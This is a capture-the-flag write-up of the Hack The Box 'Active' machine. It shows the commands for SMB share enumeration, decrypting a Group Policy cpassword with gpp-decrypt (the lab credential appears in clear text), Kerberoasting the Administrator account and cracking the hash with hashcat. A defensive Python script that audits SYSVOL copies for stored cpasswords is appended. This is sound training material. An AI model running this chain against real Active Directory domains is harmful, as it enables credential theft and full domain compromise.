Active

February 03, 2025

Created by: eks & mrb3n
Page: Hack The Box
Difficulty: Easy
OS: Windows

The first step is to scan for open ports and then enumerate the service versions and technologies running on them.

```bash
nmap -p- --open -vvv --min-rate 3000 -Pn -sS 10.10.10.100 -oG scan
/opt/extractports scan
nmap -p53,88,135,139,389,445,464,593,636,3268,3269,5722,9389,49152,49153,49154,49155,49157,49158,49164,49173,49175 -Pn -sCV 10.10.10.100 -oN ports
```

The scan reveals the domain active.htb, which I add to the hosts file.

I list the shared resources without credentials and see a share called "Replication" on which I have read permission.

```bash
netexec smb 10.10.10.100 -u '' -p '' --shares
```

I connect to the share and, after searching, find a Groups.xml file containing credentials for the user SVC_TGS.

```bash
smbclient \\\\10.10.10.100\\Replication -N
```

Using gpp-decrypt, I decrypt the password stored in that Group Policy file.

```bash
gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
```

The credentials are valid. With this user I have read permission on the Users share. I connect to it and read the first flag.

```bash
netexec smb 10.10.10.100 -u SVC_TGS -p GPPstillStandingStrong2k18 --shares
smbclient \\\\10.10.10.100\\Users -U SVC_TGS
```

With valid user credentials in hand, I check whether any account has an SPN set, which would allow a Kerberoasting attack. I see that I can run it against the Administrator user.

```bash
impacket-GetUserSPNs active.htb/SVC_TGS:GPPstillStandingStrong2k18 -request
hashcat -m 13100 tgsAdministrator /usr/share/wordlists/rockyou.txt
```

After obtaining the TGS for that user, I tried to recover the password in clear text and succeeded. I then connected over SMB to the Users share and read the second flag.

```bash
smbclient \\\\10.10.10.100\\Users -U Administrator
```
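
Seen from the defending side, the Groups.xml finding above is something an administrator can audit for. The following is an added example, not part of the original writeup: it walks a local copy of a SYSVOL or Replication tree and reports every XML element that still carries a non-empty `cpassword` attribute, without decrypting or printing the value. The account attribute names, the directory layout and the sample file are assumptions constructed for the demonstration.

```python
import os
import tempfile
import xml.etree.ElementTree as ET

# Attributes that usually name the account beside a cpassword (assumption).
ACCOUNT_ATTRS = ("userName", "accountName", "runAs", "username")

def find_cpasswords(root_dir):
    """Return (relative path, element tag, account) for each XML element under
    root_dir with a non-empty cpassword. The value itself is never returned."""
    findings = []
    for dirpath, _dirs, files in os.walk(root_dir):
        for name in files:
            if not name.lower().endswith(".xml"):
                continue
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root_dir)
            try:
                tree = ET.parse(path)
            except (ET.ParseError, OSError):
                findings.append((rel, "unparseable", None))  # review by hand
                continue
            for elem in tree.iter():
                if elem.get("cpassword"):
                    account = next((elem.get(a) for a in ACCOUNT_ATTRS if elem.get(a)), None)
                    findings.append((rel, elem.tag, account))
    return findings

# Constructed sample shaped like a GPP Groups.xml; not real data.
SAMPLE = """<?xml version="1.0" encoding="utf-8"?>
<Groups>
  <User name="svc_demo"><Properties cpassword="CONSTRUCTED_PLACEHOLDER" userName="EXAMPLE\\svc_demo"/></User>
  <User name="clean"><Properties cpassword="" userName="EXAMPLE\\clean"/></User>
</Groups>"""

def demo():
    """Build a throwaway SYSVOL-like tree (hypothetical layout) and scan it."""
    with tempfile.TemporaryDirectory() as root:
        gpo = os.path.join(root, "Policies", "{CONSTRUCTED-GUID}", "MACHINE", "Preferences", "Groups")
        os.makedirs(gpo)
        for fname, body in (("Groups.xml", SAMPLE), ("broken.xml", "<Groups><User>")):
            with open(os.path.join(gpo, fname), "w", encoding="utf-8") as fh:
                fh.write(body)
        return sorted(find_cpasswords(root), key=lambda f: f[1])

if __name__ == "__main__":
    for rel, tag, account in demo():
        print(f"{rel}: <{tag}> account={account}")
```

Any account reported this way should have its password rotated and the stored value removed from the policy, since every domain user who can read the share can read the file.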